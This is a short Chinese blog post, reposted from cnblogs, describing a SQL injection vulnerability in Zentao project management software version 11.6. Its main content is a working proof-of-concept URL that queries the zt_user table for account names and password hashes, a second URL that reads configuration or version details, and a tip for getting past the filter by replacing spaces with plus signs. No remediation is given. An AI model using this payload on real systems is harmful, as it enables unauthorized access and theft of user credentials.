往期hvv高危漏洞——禅道项目管理软件11.6 SQL注入漏洞
本文参考链接
Poc
http://xxx.xxx.xxx.xxx/api-getModel-api-sql-sql=select+account,password+from+zt_user
Poc之读取版本信息
http://localhost:8084/zentaopms11.6/www/index.php?mode=getconfig
漏洞成因:
SQL语句执行前,过滤不严格。
绕过方式:
将 “空格” 替换为 “+” 即可。
详情可参考“本文参考链接”。
本文来自博客园,作者:怀玉,转载请注明原文链接:https://www.cnblogs.com/--l-/p/18235774